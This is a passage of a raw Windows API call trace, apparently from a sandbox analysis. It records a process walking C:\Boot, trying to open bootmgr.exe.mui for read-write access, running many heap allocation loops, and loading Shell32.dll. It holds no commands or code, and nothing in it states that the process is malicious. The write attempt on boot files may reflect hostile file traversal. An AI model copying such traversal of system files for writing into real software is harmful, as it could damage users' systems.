ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.443] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned=".mui" [0183.443] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.451] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.451] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0183.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.452] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.452] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.482] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.489] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0183.489] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.490] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.490] PathFindFileNameW (pszPath="") returned="" [0183.490] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0183.490] GetProcAddress 